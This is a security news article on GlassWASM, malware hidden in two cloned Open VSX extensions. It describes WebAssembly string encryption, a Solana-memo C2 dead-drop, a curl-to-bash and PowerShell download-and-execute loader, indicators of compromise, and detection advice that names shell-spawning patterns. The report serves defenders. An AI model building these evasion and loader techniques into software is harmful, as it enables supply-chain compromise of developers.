GlassWASM Malware Hidden in Open VSX Extensions

Security researchers have uncovered GlassWASM malware, a stealthy threat hiding inside trojanized Visual Studio Code extensions. Socket’s Threat Research team spotted the campaign on the Open VSX marketplace. Moreover, the attackers wrapped their logic in WebAssembly and leaned on the Solana blockchain to dodge detection. As a result, ordinary scanners largely miss it.

Two Trojanized Open VSX Extensions

Socket identified two malicious package versions on Open VSX. They are exargd/vsblack@0.0.1 and noellee-doc/flint-debug@0.1.1. Furthermore, a single account named zaitoona43 uploaded both within two days. That GitHub account was only three days old at publication.

These carriers are not typosquats. Instead, they clone legitimate, verified VS Code Marketplace extensions down to the publisher ID, version, and repo links. According to Socket, this is “identity impersonation that exploits a cross-registry trust gap, not typosquatting.” Consequently, a developer browsing Open VSX sees details that match the trusted original.

Why the targets matter

The cloned debugger themes its interface around blockchain “transaction” debugging. Therefore, it blends naturally with the payload’s crypto-developer focus. Open VSX also serves as the default registry for VSCodium, Cursor, Windsurf, and Gitpod. So the blast radius reaches well beyond stock VS Code.

WebAssembly as an Evasion Layer

The payload ships as a TinyGo-compiled WebAssembly module. Notably, it carries no readable URLs, commands, or wallet strings. Instead, every meaningful string sits encrypted under ChaCha20 and rebuilds only in memory at runtime. Because of this, signature and YARA rules keyed on text simply will not fire.

Socket frames the takeaway bluntly. The team notes that “WebAssembly in an npm package is a high-signal artifact.” In short, a .wasm blob plus a small JS shim deserves the same scrutiny as heavily obfuscated script.

Solana Blockchain as a C2 Dead-Drop

Rather than hardcoding a server, GlassWASM reads its orders off the public Solana blockchain. First, it polls an attacker-controlled wallet for recent transactions. Then it extracts the C2 host from the SPL Memo field attached to those transactions. Researchers resolved the live memo to the host dodod[.]lat.

This design is deliberately resilient. The wallet stays fixed, yet the operator can rotate servers by simply posting a new memo. Meanwhile, the JSON-RPC traffic blends with any legitimate app that reads Solana state.

Cross-Platform Download-and-Execute

Once the host resolves, the module builds an OS-specific command. On macOS and Linux, it runs curl piped into bash. On Windows, it runs Invoke-RestMethod piped into Invoke-Expression. Node’s child_process then executes the command with the console window hidden.

This is a classic fileless loader. Because the second stage arrives at runtime, its capability stays open-ended infostealer, wallet drainer, or another loader. At analysis time, however, the host did not yet serve payloads, so the operator’s ultimate intent remains unconfirmed.

Ties to the GlassWorm Campaign

Socket attributes GlassWASM to the GlassWorm developer with medium confidence. The dead-drop mechanism, the runtime-decrypted loader, and the Open VSX delivery all match prior GlassWorm tradecraft. However, the WebAssembly packaging marks a clear pivot toward binary loading for obfuscation.

Importantly, the host dodod[.]lat and the watched wallet are net-new indicators. Therefore, defenders should treat both as fresh, actionable IOCs.

Defending Against GlassWASM

Socket reported the packages, and the Open VSX team removed them quickly. Still, several practical defenses remain. First, block and hunt for dodod[.]lat and the watched wallet address. Second, build EDR rules for Node processes spawning bash, curl, or PowerShell. Third, flag any npm or extension package that bundles a .wasm file beside a JS loader.

Finally, anyone who activated either extension should assume the second stage ran. Accordingly, rotate developer, CI, cloud, and npm credentials reachable from that host. GlassWASM malware shows how blockchain dead-drops and WebAssembly together push supply-chain attacks past traditional detection.